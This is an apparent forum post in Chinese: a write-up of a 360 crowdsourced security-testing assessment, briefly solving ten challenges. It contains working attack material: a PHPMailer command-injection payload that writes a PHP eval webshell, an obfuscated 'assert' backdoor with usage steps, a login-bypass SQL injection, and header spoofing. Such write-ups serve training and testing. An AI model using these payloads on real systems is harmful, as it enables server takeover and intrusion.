记一次0403-360众测考核WP

1,微信 User-Agent头伪造

User-Agent: Mozilla/5.0 (iPhone; CPU iPhoneOS 8_0 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12A365MicroMessenger/6.0 NetType/2GChrome/80.0.3987.149 Safari/537.36

2,PHPMailer远程命令执行漏洞

email填写:
"xxx". -OQueueDirectory=/tmp/. -X/var/www/html/xxxx.php @xxx.com
message填写:
<?php @eval($_GET[a]);?>

就会生成一个 xxxx.php,内容是 message填写的内容。访问之即可getshell。

3,登录框SQL盲注

跑了半个多小时盲注。密码32位的还有两个。。。差点心态崩了。然后突然想起。。登录框注入。。。万能密码不就好了吗。。。

4,Supervisor远程命令执行漏洞(CVE-2017-11610)

https://blog.51cto.com/eth10/1955450
直接用exp秒

5,Referer来源伪造

burp把Referer改成他要的那个Referer就好了

6,一个很简单的代码审计,也称不上代码审计的审计。。。

代码如下:

<?php
if(!empty($_GET[1]) && $_GET[1]=='GET.fPZ87')    {
    [email protected]('t.php', 'a');
    @fwrite($_,"<?php \$_=str_replace('ilo','ass',str_replace('vey','ert',\$_GET[2]));
    @\$_(\$_POST[1]);?>");
    @fclose($_);
    }
?>

先带个 ?1=GET.fPZ87 访问之,然后就会生成一个 t.php,访问t.php的时候get带上 ?2=ilovey 然后POST带上 1=php代码就好了

7,PHPCMS v9.1.多的。

只有一个前台,其他功能用不了。想登录二维码也没有,当时没时间就没做了

8,一个加解密啥的。是一个exe,吃了不会反编译的亏

9,wireshark分析数据包的。还挺简单。有技巧的查找

搜索php找到上传的马。然后看那个马干了啥就好了。

10,wireshark分析数据包的。也挺简单。有技巧的查找

找上传者的ip地址。一个技巧:把POST请求的数据包筛选出来。然后从第一个POST请求数据包开始提交IP地址。过滤PHP,POST,HTML

最终总结:

一开始做的时候会很慌,特别是我做SQL时间盲注的时候,一点点的出结果,等的人都傻了,还好后面想起可以万能密码登录,就是要随机应变吧,思路灵活点就好了。放松心态就好做很多。

鄙人不才,像我这种菜鸡。最终也是拿到了分数
微信图片_20200403224950
相信各位师傅也是可以的,加油冲冲冲!!!

8 Likes